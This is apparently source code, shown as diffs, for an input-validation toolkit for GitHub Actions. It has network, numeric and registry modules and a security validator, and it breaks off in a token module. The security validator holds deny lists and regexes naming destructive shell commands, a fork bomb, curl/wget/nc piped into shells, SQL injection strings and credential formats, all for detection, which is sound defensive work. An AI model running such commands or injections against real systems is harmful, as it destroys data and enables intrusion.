hostname_pattern = r"^(?!-)(?:[a-zA-Z0-9-]{1,63}(?<!-)\.)*[a-zA-Z0-9-]{1,63}(?<!-)$"
if re.match(hostname_pattern, hostname):
return True
# Also allow localhost and IPv6 loopback
if hostname in ["localhost", "::1", "::"]:
return True
# Also check if it's an IP address (which can be a valid hostname)
if self.validate_ip_address(hostname):
return True
self.add_error(f'Invalid {name}: "{hostname}". Must be a valid hostname')
return False
def validate_ip_address(self, ip: str, name: str = "ip_address") -> bool:
"""Validate IP address (IPv4 or IPv6).
Args:
ip: The IP address to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not ip or ip.strip() == "":
return True # IP address is often optional
# IPv4 pattern
ipv4_pattern = (
r"^(?:(?:25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}"
r"(?:25[0-5]|2[0-4]\d|[01]?\d\d?)$"
)
if re.match(ipv4_pattern, ip):
return True
# Simplified IPv6 pattern (full validation is complex)
# This covers most common cases: full form, loopback (::1), and unspecified (::)
ipv6_pattern = r"^(?:(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}|::1|::)$"
if re.match(ipv6_pattern, ip):
return True
# Allow compressed IPv6
if "::" in ip:
# Very basic check for compressed IPv6
parts = ip.split("::")
if len(parts) == 2:
# Check if parts look like hex
for part in parts:
if part and not all(c in "0123456789abcdefABCDEF:" for c in part):
self.add_error(f'Invalid {name}: "{ip}". Not a valid IP address')
return False
return True
self.add_error(f'Invalid {name}: "{ip}". Must be a valid IPv4 or IPv6 address')
return False
def validate_port(self, port: str, name: str = "port") -> bool:
"""Validate port number.
Args:
port: The port number to validate (as string)
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not port or port.strip() == "":
return True # Port is often optional
# Check if it's a number
try:
port_num = int(port)
except ValueError:
self.add_error(f'Invalid {name}: "{port}". Port must be a number')
return False
# Check valid range (1-65535)
if port_num < 1 or port_num > 65535:
self.add_error(f"Invalid {name}: {port}. Port must be between 1 and 65535")
return False
return True

279
validate-inputs/validators/numeric.py Normal file
View File

@@ -0,0 +1,279 @@
"""Numeric validators for ranges and numeric inputs."""
from __future__ import annotations
from .base import BaseValidator
class NumericValidator(BaseValidator):
"""Validator for numeric inputs and ranges."""
def validate_inputs(self, inputs: dict[str, str]) -> bool:
"""Validate numeric inputs."""
valid = True
for input_name, value in inputs.items():
# Check for specific numeric patterns
if "retries" in input_name or "retry" in input_name:
valid &= self.validate_range(value, 0, 10, input_name)
elif "timeout" in input_name:
valid &= self.validate_range(value, 1, 3600, input_name)
elif "threads" in input_name or "workers" in input_name:
valid &= self.validate_range(value, 1, 128, input_name)
elif "ram" in input_name or "memory" in input_name:
valid &= self.validate_range(value, 256, 32768, input_name)
elif "quality" in input_name:
valid &= self.validate_range(value, 0, 100, input_name)
elif "parallel" in input_name and "builds" in input_name:
valid &= self.validate_range(value, 0, 16, input_name)
elif "max-warnings" in input_name or "max_warnings" in input_name:
valid &= self.validate_range(value, 0, 10000, input_name)
elif "delay" in input_name:
valid &= self.validate_range(value, 1, 300, input_name)
return valid
def get_required_inputs(self) -> list[str]:
"""Numeric validators typically don't define required inputs."""
return []
def get_validation_rules(self) -> dict:
"""Return numeric validation rules."""
return {
"retries": "0-10",
"timeout": "1-3600 seconds",
"threads": "1-128",
"ram": "256-32768 MB",
"quality": "0-100",
"parallel_builds": "0-16",
"max_warnings": "0-10000",
"delay": "1-300 seconds",
}
def validate_range(
self,
value: str,
min_val: int | None,
max_val: int | None,
name: str = "value",
) -> bool:
"""Validate numeric input within a specific range.
Args:
value: The value to validate
min_val: Minimum allowed value (None for no minimum)
max_val: Maximum allowed value (None for no maximum)
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # Numeric values are often optional
# Allow GitHub Actions expressions
if self.is_github_expression(value):
return True
try:
num = int(value.strip())
# Handle None values for min and max
if min_val is not None and num < min_val:
self.add_error(f"Invalid {name}: {num}. Must be at least {min_val}")
return False
if max_val is not None and num > max_val:
self.add_error(f"Invalid {name}: {num}. Must be at most {max_val}")
return False
return True
except ValueError:
self.add_error(f'Invalid {name}: "{value}". Must be a number')
return False
def validate_numeric_range(
self,
value: str,
min_val: int | None = None,
max_val: int | None = None,
name: str = "numeric",
) -> bool:
"""Generic numeric range validation.
Args:
value: The value to validate
min_val: Minimum allowed value (inclusive), None for no minimum
max_val: Maximum allowed value (inclusive), None for no maximum
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
return self.validate_range(value, min_val, max_val, name)
def validate_numeric_range_0_100(self, value: str, name: str = "value") -> bool:
"""Validate percentage or quality value (0-100).
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
return self.validate_range(value, 0, 100, name)
def validate_numeric_range_1_10(self, value: str, name: str = "retries") -> bool:
"""Validate retry count (1-10).
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
return self.validate_range(value, 1, 10, name)
def validate_numeric_range_1_128(self, value: str, name: str = "threads") -> bool:
"""Validate thread/worker count (1-128).
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
return self.validate_range(value, 1, 128, name)
def validate_numeric_range_256_32768(self, value: str, name: str = "ram") -> bool:
"""Validate RAM in MB (256-32768).
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
return self.validate_range(value, 256, 32768, name)
def validate_numeric_range_0_16(self, value: str, name: str = "parallel-builds") -> bool:
"""Validate parallel builds count (0-16).
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
return self.validate_range(value, 0, 16, name)
def validate_numeric_range_0_10000(self, value: str, name: str = "max-warnings") -> bool:
"""Validate max warnings count (0-10000).
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
return self.validate_range(value, 0, 10000, name)
def validate_numeric_range_1_300(self, value: str, name: str = "delay") -> bool:
"""Validate delay in seconds (1-300).
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
return self.validate_range(value, 1, 300, name)
def validate_numeric_range_1_3600(self, value: str, name: str = "timeout") -> bool:
"""Validate timeout in seconds (1-3600).
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
return self.validate_range(value, 1, 3600, name)
def validate_integer(self, value: str | int, name: str = "value") -> bool:
"""Validate integer (can be negative).
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or str(value).strip() == "":
return True # Optional
# Allow GitHub Actions expressions
if self.is_github_expression(str(value)):
return True
try:
int(str(value).strip())
return True
except ValueError:
self.add_error(f'Invalid {name}: "{value}". Must be an integer')
return False
def validate_positive_integer(self, value: str, name: str = "value") -> bool:
"""Validate positive integer (> 0).
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # Optional
try:
num = int(value.strip())
if num > 0:
return True
self.add_error(f"Invalid {name}: {num}. Must be positive")
return False
except ValueError:
self.add_error(f'Invalid {name}: "{value}". Must be a positive integer')
return False
def validate_non_negative_integer(self, value: str, name: str = "value") -> bool:
"""Validate non-negative integer (>= 0).
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # Optional
try:
num = int(value.strip())
if num >= 0:
return True
self.add_error(f"Invalid {name}: {num}. Cannot be negative")
return False
except ValueError:
self.add_error(f'Invalid {name}: "{value}". Must be a non-negative integer')
return False

234
validate-inputs/validators/registry.py Normal file
View File

@@ -0,0 +1,234 @@
"""Validator registry for dynamic validator discovery and loading.
Manages the registration and instantiation of validators.
"""
from __future__ import annotations
import importlib
import importlib.util
import logging
from pathlib import Path
import sys
from typing import TYPE_CHECKING
from .convention_mapper import ConventionMapper
from .conventions import ConventionBasedValidator
if TYPE_CHECKING:
from .base import BaseValidator
class ValidatorRegistry:
"""Registry for managing and discovering validators.
Provides dynamic loading of custom validators and fallback to convention-based validation.
"""
def __init__(self) -> None:
"""Initialize the validator registry."""
self._validators: dict[str, type[BaseValidator]] = {}
self._validator_instances: dict[str, BaseValidator] = {}
self._convention_mapper = ConventionMapper()
def register(self, action_type: str, validator_class: type[BaseValidator]) -> None:
"""Register a validator class for an action type.
Args:
action_type: The action type identifier
validator_class: The validator class to register
"""
self._validators[action_type] = validator_class
def register_validator(self, action_type: str, validator_class: type[BaseValidator]) -> None:
"""Register a validator class for an action type (alias for register).
Args:
action_type: The action type identifier
validator_class: The validator class to register
"""
self.register(action_type, validator_class)
# Also create and cache an instance
validator_instance = validator_class(action_type)
self._validator_instances[action_type] = validator_instance
def get_validator(self, action_type: str) -> BaseValidator:
"""Get a validator instance for the given action type.
First attempts to load a custom validator from the action directory,
then falls back to convention-based validation.
Args:
action_type: The action type identifier
Returns:
A validator instance for the action
"""
# Check cache first
if action_type in self._validator_instances:
return self._validator_instances[action_type]
# Try to load custom validator
validator = self._load_custom_validator(action_type)
# Fall back to convention-based validator
if not validator:
validator = self._load_convention_validator(action_type)
# Cache and return
self._validator_instances[action_type] = validator
return validator
def _load_custom_validator(self, action_type: str) -> BaseValidator | None:
"""Attempt to load a custom validator from the action directory.
Args:
action_type: The action type identifier
Returns:
Custom validator instance or None if not found
"""
# Convert action_type to directory name (e.g., sync_labels -> sync-labels)
action_dir = action_type.replace("_", "-")
# Look for CustomValidator.py in the action directory
project_root = Path(__file__).parent.parent.parent
custom_validator_path = project_root / action_dir / "CustomValidator.py"
if not custom_validator_path.exists():
return None
try:
# Load the module dynamically
spec = importlib.util.spec_from_file_location(
f"{action_type}_custom_validator",
custom_validator_path,
)
if not spec or not spec.loader:
return None
module = importlib.util.module_from_spec(spec)
sys.modules[spec.name] = module
spec.loader.exec_module(module)
# Get the CustomValidator class
if hasattr(module, "CustomValidator"):
validator_class = module.CustomValidator
return validator_class(action_type)
except (ImportError, AttributeError, TypeError, ValueError) as e:
# Log at debug level - custom validators are optional
# Catch common errors during dynamic module loading:
# - ImportError: Module dependencies not found
# - AttributeError: Module doesn't have CustomValidator
# - TypeError: Validator instantiation failed
# - ValueError: Invalid validator configuration
logger = logging.getLogger(__name__)
logger.debug("Could not load custom validator for %s: %s", action_type, e)
return None
def _load_convention_validator(self, action_type: str) -> BaseValidator:
"""Load a convention-based validator for the action type.
Args:
action_type: The action type identifier
Returns:
Convention-based validator instance
"""
return ConventionBasedValidator(action_type)
def clear_cache(self) -> None:
"""Clear the validator instance cache."""
self._validator_instances.clear()
def list_registered(self) -> list[str]:
"""List all registered action types.
Returns:
List of registered action type identifiers
"""
return list(self._validators.keys())
def is_registered(self, action_type: str) -> bool:
"""Check if an action type has a registered validator.
Args:
action_type: The action type identifier
Returns:
True if a validator is registered, False otherwise
"""
return action_type in self._validators
def get_validator_by_type(self, validator_type: str) -> BaseValidator | None:
"""Get a validator instance by its type name.
Args:
validator_type: The validator type name (e.g., 'BooleanValidator', 'TokenValidator')
Returns:
A validator instance or None if not found
"""
# Map of validator type names to modules
validator_modules = {
"BooleanValidator": "boolean",
"CodeQLValidator": "codeql",
"DockerValidator": "docker",
"FileValidator": "file",
"NetworkValidator": "network",
"NumericValidator": "numeric",
"SecurityValidator": "security",
"TokenValidator": "token",
"VersionValidator": "version",
}
module_name = validator_modules.get(validator_type)
if not module_name:
return None
try:
# Import the module
module = importlib.import_module(f"validators.{module_name}")
# Get the validator class
validator_class = getattr(module, validator_type, None)
if validator_class:
# Create an instance with a dummy action type
return validator_class("temp")
except (ImportError, AttributeError):
# Silently ignore if custom validator module doesn't exist or class not found
pass
return None
# Global registry instance
_registry = ValidatorRegistry()
def get_validator(action_type: str) -> BaseValidator:
"""Get a validator for the given action type.
Args:
action_type: The action type identifier
Returns:
A validator instance for the action
"""
return _registry.get_validator(action_type)
def register_validator(action_type: str, validator_class: type[BaseValidator]) -> None:
"""Register a validator class for an action type.
Args:
action_type: The action type identifier
validator_class: The validator class to register
"""
_registry.register(action_type, validator_class)
def clear_cache() -> None:
"""Clear the global validator cache."""
_registry.clear_cache()

748
validate-inputs/validators/security.py Normal file
View File

@@ -0,0 +1,748 @@
"""Security validator for detecting injection patterns and security issues."""
from __future__ import annotations
import re
from typing import ClassVar
from .base import BaseValidator
class SecurityValidator(BaseValidator):
"""Validator for security-related checks across all inputs."""
# Common injection patterns to detect
INJECTION_PATTERNS: ClassVar[list[tuple[str, str]]] = [
(r";\s*rm\s+-rf", "rm -rf command"),
(r";\s*del\s+", "del command"),
(r"&&\s*curl\s+", "curl command injection"),
(r"&&\s*wget\s+", "wget command injection"),
(r"\|\s*sh\b", "pipe to shell"),
(r"\|\s*bash\b", "pipe to bash"),
(r"`[^`]+`", "command substitution"),
(r"\$\([^)]+\)", "command substitution"),
(r"\${[^}]+}", "variable expansion"),
(r"<script[^>]*>", "script tag injection"),
(r"javascript:", "javascript protocol"),
(r"data:text/html", "data URI injection"),
]
def validate_inputs(self, inputs: dict[str, str]) -> bool:
"""Validate all inputs for security issues."""
valid = True
for input_name, value in inputs.items():
# Skip empty values
if not value or not value.strip():
continue
# Apply security validation to all inputs
valid &= self.validate_security_patterns(value, input_name)
# Additional checks for specific input types
if "regex" in input_name or "pattern" in input_name:
valid &= self.validate_regex_pattern(value, input_name)
elif "path" in input_name or "file" in input_name:
valid &= self.validate_path_security(value, input_name)
elif "url" in input_name or "uri" in input_name:
valid &= self.validate_url_security(value, input_name)
elif "command" in input_name or "cmd" in input_name:
valid &= self.validate_command_security(value, input_name)
return valid
def get_required_inputs(self) -> list[str]:
"""Security validator doesn't define required inputs."""
return []
def get_validation_rules(self) -> dict:
"""Return security validation rules."""
return {
"injection_patterns": "Command injection detection",
"path_traversal": "Path traversal prevention",
"xss_prevention": "Cross-site scripting prevention",
}
def validate_injection_patterns(self, value: str, name: str = "input") -> bool:
"""Check for advanced injection patterns.
Args:
value: The value to check
name: The input name for error messages
Returns:
True if no injection patterns found, False otherwise
"""
if not value or value.strip() == "":
return True
# Check against known injection patterns
for pattern, description in self.INJECTION_PATTERNS:
if re.search(pattern, value, re.IGNORECASE):
self.add_error(f"Security issue in {name}: detected {description}")
return False
return True
def validate_url_security(self, url: str, name: str = "url") -> bool:
"""Validate URL for security issues.
Args:
url: The URL to validate
name: The input name for error messages
Returns:
True if secure, False otherwise
"""
if not url or url.strip() == "":
return True
# Check for javascript: protocol
if url.lower().startswith("javascript:"):
self.add_error(f"Security issue in {name}: javascript: protocol not allowed")
return False
# Check for data: URI with HTML
if url.lower().startswith("data:") and "text/html" in url.lower():
self.add_error(f"Security issue in {name}: data:text/html URIs not allowed")
return False
# Check for file: protocol
if url.lower().startswith("file:"):
self.add_error(f"Security issue in {name}: file: protocol not allowed")
return False
return True
def validate_command_security(self, command: str, name: str = "command") -> bool:
"""Validate command for security issues.
Args:
command: The command to validate
name: The input name for error messages
Returns:
True if secure, False otherwise
"""
if not command or command.strip() == "":
return True
# Dangerous commands that should not be allowed
dangerous_commands = [
"rm -rf",
"rm -fr",
"format c:",
"del /f /s /q",
"shutdown",
"reboot",
":(){:|:&};:", # Fork bomb
"dd if=/dev/zero",
"dd if=/dev/random", # Also dangerous
"mkfs",
"chmod -R 777", # Dangerous permission change
"chmod 777",
"chown -R", # Dangerous ownership change
]
command_lower = command.lower()
for dangerous in dangerous_commands:
if dangerous.lower() in command_lower:
self.add_error(
f"Security issue in {name}: dangerous command pattern '{dangerous}' detected",
)
return False
# Check for base64 encoded commands (often used to hide malicious code)
if re.search(r"base64\s+-d|base64\s+--decode", command, re.IGNORECASE):
self.add_error(f"Security issue in {name}: base64 decode operations not allowed")
return False
return True
def validate_content_security(self, content: str, name: str = "content") -> bool:
"""Validate content for XSS and injection.
Args:
content: The content to validate
name: The input name for error messages
Returns:
True if secure, False otherwise
"""
if not content or content.strip() == "":
return True
# Check for script tags (match any content between script and >)
if re.search(r"<script[^>]*>.*?</script[^>]*>", content, re.IGNORECASE | re.DOTALL):
self.add_error(f"Security issue in {name}: script tags not allowed")
return False
# Check for event handlers
event_handlers = [
"onclick",
"onload",
"onerror",
"onmouseover",
"onfocus",
"onblur",
"onchange",
"onsubmit",
]
for handler in event_handlers:
if re.search(rf"\b{handler}\s*=", content, re.IGNORECASE):
self.add_error(f"Security issue in {name}: event handler '{handler}' not allowed")
return False
# Check for iframe injection
if re.search(r"<iframe[^>]*>", content, re.IGNORECASE):
self.add_error(f"Security issue in {name}: iframe tags not allowed")
return False
return True
def validate_prefix_security(self, prefix: str, name: str = "prefix") -> bool:
"""Validate prefix for security issues.
Args:
prefix: The prefix to validate
name: The input name for error messages
Returns:
True if secure, False otherwise
"""
if not prefix or prefix.strip() == "":
return True
# Only alphanumeric, dots, underscores, and hyphens
if not re.match(r"^[a-zA-Z0-9_.-]*$", prefix):
self.add_error(f"Security issue in {name}: '{prefix}' contains invalid characters")
return False
return True
def validate_no_injection(self, value: str, name: str = "input") -> bool:
"""Comprehensive injection detection.
Args:
value: The value to check
name: The input name for error messages
Returns:
True if no injection patterns found, False otherwise
"""
if not value or value.strip() == "":
return True
# Allow GitHub expressions (they're safe in Actions context)
if self.is_github_expression(value):
return True
# Check for command injection patterns
if not self.validate_security_patterns(value, name):
return False
# Check for single & (background execution)
if re.search(r"(?<!&)&(?!&)", value):
self.add_error(f"Background execution pattern '&' detected in {name}")
return False
# Check for advanced injection patterns
if not self.validate_injection_patterns(value, name):
return False
# Check for SQL injection patterns
sql_patterns = [
r"'\s*OR\s+'[^']*'\s*=\s*'[^']*", # ' OR '1'='1
r'"\s*OR\s+"[^"]*"\s*=\s*"[^"]*', # " OR "1"="1
r"'\s*OR\s+\d+\s*=\s*\d+", # ' OR 1=1
r";\s*DROP\s+TABLE", # ; DROP TABLE
r";\s*DELETE\s+FROM", # ; DELETE FROM
r"UNION\s+SELECT", # UNION SELECT
r"--\s*$", # SQL comment at end
r";\s*EXEC\s+", # ; EXEC
r"xp_cmdshell", # SQL Server command execution
]
for pattern in sql_patterns:
if re.search(pattern, value, re.IGNORECASE):
self.add_error(f"SQL injection pattern detected in {name}")
return False
# Check for script injection patterns
return self.validate_content_security(value, name)
def validate_safe_command(self, command: str, name: str = "command") -> bool:
"""Validate that a command is safe to execute.
Args:
command: The command to validate
name: The input name for error messages
Returns:
True if command appears safe, False otherwise
"""
if not command or command.strip() == "":
return True
# Allow GitHub expressions (they're safe in Actions context)
if self.is_github_expression(command):
return True
# Use existing command security validation
if not self.validate_command_security(command, name):
return False
# Check for dangerous redirect to device files
if re.search(r">\s*/dev/", command):
self.add_error(f"Security issue in {name}: redirect to device file not allowed")
return False
# Check for filesystem creation commands
if re.search(r"\bmkfs", command, re.IGNORECASE):
self.add_error(f"Security issue in {name}: filesystem creation commands not allowed")
return False
# Additional checks for safe commands
# Block shell metacharacters that could be dangerous
dangerous_chars = ["&", "|", ";", "$", "`", "\\", "!", "{", "}", "[", "]", "(", ")"]
for char in dangerous_chars:
if char in command:
# Allow some safe uses
if char == "&" and "&&" not in command and "&>" not in command:
continue
self.add_error(f"Potentially dangerous character '{char}' in {name}")
return False
return True
def validate_safe_environment_variable(self, value: str, name: str = "env_var") -> bool:
"""Validate environment variable value for security.
Args:
value: The environment variable value
name: The input name for error messages
Returns:
True if safe, False otherwise
"""
if not value or value.strip() == "":
return True
# Check for command substitution in env vars
if "$(" in value or "`" in value or "${" in value:
self.add_error(f"Command substitution not allowed in environment variable {name}")
return False
# Check for newlines (could be used to inject multiple commands)
if "\n" in value or "\r" in value:
self.add_error(f"Newlines not allowed in environment variable {name}")
return False
# Check for null bytes (could be used for string termination attacks)
if "\x00" in value:
self.add_error(f"Null bytes not allowed in environment variable {name}")
return False
# Check for shell special chars that might cause issues
if re.search(r"[;&|]", value) and re.search(
r";\s*(rm|del|format|shutdown|reboot)",
value,
re.IGNORECASE,
):
self.add_error(f"Dangerous command pattern in environment variable {name}")
return False
return True
# Alias for test compatibility
def validate_safe_env_var(self, value: str, name: str = "env_var") -> bool:
"""Alias for validate_safe_environment_variable for test compatibility."""
return self.validate_safe_environment_variable(value, name)
def _check_github_tokens(self, value: str, name: str) -> bool:
"""Check for GitHub token patterns.
Args:
value: The value to check
name: The input name for error messages
Returns:
True if no GitHub tokens found, False otherwise
"""
github_token_patterns = [
r"ghp_[a-zA-Z0-9]{36}", # GitHub personal access token
r"gho_[a-zA-Z0-9]{36}", # GitHub OAuth token
r"ghu_[a-zA-Z0-9]{36}", # GitHub user token
r"ghs_[a-zA-Z0-9]{36}", # GitHub server token
r"ghr_[a-zA-Z0-9]{36}", # GitHub refresh token
r"github_pat_[a-zA-Z0-9_]{48,}", # GitHub fine-grained PAT
]
for pattern in github_token_patterns:
if re.search(pattern, value):
self.add_error(f"Potential GitHub token detected in {name}")
return False
return True
def _check_api_keys(self, value: str, name: str) -> bool:
"""Check for API key patterns.
Args:
value: The value to check
name: The input name for error messages
Returns:
True if no API keys found, False otherwise
"""
api_key_patterns = [
r"api[_-]?key\s*[:=]\s*['\"]?[a-zA-Z0-9]{20,}", # Generic API key
r"secret[_-]?key\s*[:=]\s*['\"]?[a-zA-Z0-9]{20,}", # Secret key
r"access[_-]?key\s*[:=]\s*['\"]?[a-zA-Z0-9]{20,}", # Access key
]
for pattern in api_key_patterns:
if re.search(pattern, value, re.IGNORECASE):
self.add_error(f"Potential API key detected in {name}")
return False
return True
def _check_passwords(self, value: str, name: str) -> bool:
"""Check for password patterns.
Args:
value: The value to check
name: The input name for error messages
Returns:
True if no passwords found, False otherwise
"""
password_patterns = [
r"password\s*[:=]\s*['\"]?[^\s'\"]{8,}", # Password assignment
r"passwd\s*[:=]\s*['\"]?[^\s'\"]{8,}", # Passwd assignment
r"pwd\s*[:=]\s*['\"]?[^\s'\"]{8,}", # Pwd assignment
]
for pattern in password_patterns:
if re.search(pattern, value, re.IGNORECASE):
self.add_error(f"Potential password detected in {name}")
return False
return True
def _check_private_keys(self, value: str, name: str) -> bool:
"""Check for private key markers.
Args:
value: The value to check
name: The input name for error messages
Returns:
True if no private keys found, False otherwise
"""
private_key_markers = [
"-----BEGIN RSA PRIVATE KEY-----",
"-----BEGIN PRIVATE KEY-----",
"-----BEGIN OPENSSH PRIVATE KEY-----",
"-----BEGIN DSA PRIVATE KEY-----",
"-----BEGIN EC PRIVATE KEY-----",
]
for marker in private_key_markers:
if marker in value:
self.add_error(f"Private key detected in {name}")
return False
return True
def _check_encoded_secrets(self, value: str, name: str) -> bool:
"""Check for Base64 encoded secrets.
Args:
value: The value to check
name: The input name for error messages
Returns:
True if no encoded secrets found, False otherwise
"""
# Look for long base64 strings that might be credentials
# and if it contains words like secret, key, token, password
if re.search(r"[A-Za-z0-9+/]{40,}={0,2}", value) or (
re.search(r"[A-Za-z0-9+/]{40,}={0,2}", value)
and re.search(r"(secret|key|token|password|credential)", value, re.IGNORECASE)
):
self.add_error(f"Potential encoded secret detected in {name}")
return False
return True
def validate_no_secrets(self, value: str, name: str = "input") -> bool:
"""Validate that no secrets or sensitive data are present.
Args:
value: The value to check
name: The input name for error messages
Returns:
True if no secrets detected, False otherwise
"""
if not value or value.strip() == "":
return True
# Run all secret detection checks
return (
self._check_github_tokens(value, name)
and self._check_api_keys(value, name)
and self._check_passwords(value, name)
and self._check_private_keys(value, name)
and self._check_encoded_secrets(value, name)
)
def _check_command_injection_in_regex(self, pattern: str, name: str) -> bool:
"""Check for command injection patterns in regex.
Args:
pattern: The regex pattern to validate
name: The input name for error messages
Returns:
True if safe, False if command injection detected
"""
dangerous_cmd_patterns = [
r";\s*(rm|del|cat|whoami|id|pwd|ls|curl|wget|nc|bash|sh|cmd)",
r"&&\s*(rm|del|cat|whoami|id|pwd|ls|curl|wget|nc|bash|sh|cmd)",
r"\|\s*(sh|bash|cmd)\b",
r"`[^`]+`",
r"\$\([^)]+\)",
]
for cmd_pattern in dangerous_cmd_patterns:
if re.search(cmd_pattern, pattern, re.IGNORECASE):
self.add_error(f"Command injection detected in {name}")
return False
return True
def _check_nested_quantifiers(self, pattern: str, name: str) -> bool:
"""Check for nested quantifiers that can cause ReDoS.
Args:
pattern: The regex pattern to validate
name: The input name for error messages
Returns:
True if safe, False if nested quantifiers detected
"""
nested_quantifier_patterns = [
r"\([^)]*[+*]\)[+*{]", # (x+)+ or (x*)* or (x+){n,m}
r"\([^)]*\{[0-9,]+\}\)[+*{]", # (x{n,m})+ or (x{n,m})*
r"\([^)]*[+*]\)\{", # (x+){n,m}
]
for redos_pattern in nested_quantifier_patterns:
if re.search(redos_pattern, pattern):
self.add_error(
f"ReDoS risk detected in {name}: nested quantifiers can cause "
"catastrophic backtracking. Avoid patterns like (a+)+, (a*)*, or (a+){n,m}"
)
return False
return True
def _check_duplicate_alternatives(self, alt1: str, alt2: str, group: str, name: str) -> bool:
"""Check if two alternatives are exact duplicates.
Args:
alt1: First alternative
alt2: Second alternative
group: The full group string for error message
name: The input name for error messages
Returns:
True if not duplicates, False if duplicates detected
"""
if alt1 == alt2:
self.add_error(
f"ReDoS risk detected in {name}: duplicate alternatives "
f"in repeating group '({group})' can cause "
"catastrophic backtracking"
)
return False
return True
def _check_overlapping_alternatives(self, alt1: str, alt2: str, group: str, name: str) -> bool:
"""Check if two alternatives have prefix overlap.
Args:
alt1: First alternative
alt2: Second alternative
group: The full group string for error message
name: The input name for error messages
Returns:
True if no overlap, False if overlap detected
"""
if alt1.startswith(alt2) or alt2.startswith(alt1):
self.add_error(
f"ReDoS risk detected in {name}: overlapping alternatives "
f"in repeating group '({group})' can cause "
"catastrophic backtracking"
)
return False
return True
def _validate_alternative_pairs(self, alternatives: list[str], group: str, name: str) -> bool:
"""Validate all pairs of alternatives for duplicates and overlaps.
Args:
alternatives: List of alternatives to check
group: The full group string for error message
name: The input name for error messages
Returns:
True if all pairs are safe, False otherwise
"""
for i, alt1 in enumerate(alternatives):
for alt2 in alternatives[i + 1 :]:
# Check for exact duplicates
if not self._check_duplicate_alternatives(alt1, alt2, group, name):
return False
# Check for prefix overlaps
if not self._check_overlapping_alternatives(alt1, alt2, group, name):
return False
return True
def _check_alternation_repetition(self, pattern: str, name: str) -> bool:
"""Check for alternation with repetition that can cause ReDoS.
Args:
pattern: The regex pattern to validate
name: The input name for error messages
Returns:
True if safe, False if problematic alternation detected
"""
alternation_repetition = r"\([^)]*\|[^)]*\)[+*{]"
if not re.search(alternation_repetition, pattern):
return True
# Check if alternatives overlap (basic heuristic)
matches = re.finditer(r"\(([^)]*\|[^)]*)\)[+*{]", pattern)
for match in matches:
alternatives = match.group(1).split("|")
# Validate all pairs of alternatives
if not self._validate_alternative_pairs(alternatives, match.group(1), name):
return False
return True
def _check_consecutive_quantifiers(self, pattern: str, name: str) -> bool:
"""Check for consecutive quantifiers that can cause ReDoS.
Args:
pattern: The regex pattern to validate
name: The input name for error messages
Returns:
True if safe, False if consecutive quantifiers detected
"""
consecutive_quantifiers = r"[.+*][+*{]"
if re.search(consecutive_quantifiers, pattern):
self.add_error(
f"ReDoS risk detected in {name}: consecutive quantifiers like .*.* or .*+ "
"can cause catastrophic backtracking"
)
return False
return True
def _check_exponential_quantifiers(self, pattern: str, name: str) -> bool:
"""Check for exponential quantifier combinations that can cause ReDoS.
Args:
pattern: The regex pattern to validate
name: The input name for error messages
Returns:
True if safe, False if exponential quantifiers detected
"""
depth = 0
max_depth = 0
quantifier_depth_count = 0
i = 0
while i < len(pattern):
char = pattern[i]
if char == "(":
depth += 1
max_depth = max(max_depth, depth)
# Check if followed by quantifier after closing
closing_idx = self._find_closing_paren(pattern, i)
if closing_idx != -1 and closing_idx + 1 < len(pattern):
next_char = pattern[closing_idx + 1]
if next_char in "+*{":
quantifier_depth_count += 1
elif char == ")":
depth -= 1
i += 1
# If we have multiple nested quantified groups (depth > 2 with 3+ quantifiers)
if max_depth > 2 and quantifier_depth_count >= 3:
self.add_error(
f"ReDoS risk detected in {name}: deeply nested groups with multiple "
"quantifiers can cause catastrophic backtracking"
)
return False
return True
def validate_regex_pattern(self, pattern: str, name: str = "regex") -> bool:
"""Validate regex pattern for ReDoS vulnerabilities.
Detects potentially dangerous regex patterns that could cause
Regular Expression Denial of Service (ReDoS) through catastrophic
backtracking.
Args:
pattern: The regex pattern to validate
name: The input name for error messages
Returns:
True if pattern appears safe, False if ReDoS risk detected
"""
if not pattern or pattern.strip() == "":
return True
# Allow GitHub expressions
if self.is_github_expression(pattern):
return True
# Run all ReDoS checks using helper methods
if not self._check_command_injection_in_regex(pattern, name):
return False
if not self._check_nested_quantifiers(pattern, name):
return False
if not self._check_alternation_repetition(pattern, name):
return False
if not self._check_consecutive_quantifiers(pattern, name):
return False
return self._check_exponential_quantifiers(pattern, name)
def _find_closing_paren(self, pattern: str, start: int) -> int:
"""Find the closing parenthesis for an opening one.
Args:
pattern: The regex pattern
start: The index of the opening parenthesis
Returns:
Index of the closing parenthesis, or -1 if not found
"""
if start >= len(pattern) or pattern[start] != "(":
return -1
depth = 1
i = start + 1
while i < len(pattern) and depth > 0:
if pattern[i] == "(":
depth += 1
elif pattern[i] == ")":
depth -= 1
if depth == 0:
return i
i += 1
return -1

232
validate-inputs/validators/token.py Normal file
View File

@@ -0,0 +1,232 @@
"""Token validators for authentication tokens."""
from __future__ import annotations
import re
from typing import ClassVar
from .base import BaseValidator
class TokenValidator(BaseValidator):
"""Validator for various authentication tokens."""
# Token patterns for different token types (based on official GitHub documentation)
# https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/about-authentication-to-github#githubs-token-formats
# Note: The lengths include the prefix
TOKEN_PATTERNS: ClassVar[dict[str, str]] = {
# Personal access token (classic):
# ghp_ + 36 = 40 chars total
"github_classic": r"^ghp_[a-zA-Z0-9]{36}$",
# Fine-grained PAT:
